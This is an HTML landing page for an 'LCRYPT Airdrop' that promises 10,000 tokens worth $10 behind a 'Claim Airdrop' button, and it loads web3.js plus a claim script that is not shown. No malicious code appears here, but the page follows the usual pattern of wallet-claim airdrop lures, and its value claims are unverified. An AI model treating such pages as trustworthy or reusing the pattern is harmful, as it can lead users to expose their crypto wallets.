<!DOCTYPE html>
<html>
<head>
    <title>Airdrop Website</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: Arial, sans-serif;
            overflow: hidden;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
            background-color: #000;
        }

        #background-video {
            position: fixed;
            right: 0;
            bottom: 0;
            min-width: 100%;
            min-height: 100%;
            width: auto;
            height: auto;
            z-index: -1;
            object-fit: cover;
        }

        @media (max-width: 768px) {
            #background-video {
                display: none; /* Hide video on small screens */
            }
        }

        .content {
            text-align: center;
            color: white;
        }

        h1 {
            font-size: 2.5em;
            margin-bottom: 0.5em;
        }

        p {
            font-size: 1.2em;
            margin-bottom: 1em;
        }

        button {
            padding: 10px 20px;
            font-size: 1.2em;
            background-color: #007bff;
            color: white;
            border: none;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        button:hover {
            background-color: #0056b3;
        }

        #logo {
            margin-bottom: 20px;
        }
    </style>
</head>
<body>
    <video autoplay muted loop id="background-video">
        <source src="Block.mp4" type="video/mp4">
        Your browser does not support the video tag.
    </video>

    <div class="content">
        <img id="logo" src="image.png" alt="Logo" width="100">
        <h1>Welcome to the LCRYPT Airdrop!</h1>
        <p>1.000.000.000 TOTAL AIRDROP</p>
        <p>Claim 10,000 LCRYPT (10$) airdrop by clicking the button below:</p>
        <p>The airdrop will end once the entire 1 billion supply has been distributed</p>
        <button id="claim-button">Claim Airdrop</button>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/web3@1.5.2/dist/web3.min.js"></script>
    <script src="claim-script.js"></script>
</body>
</html>
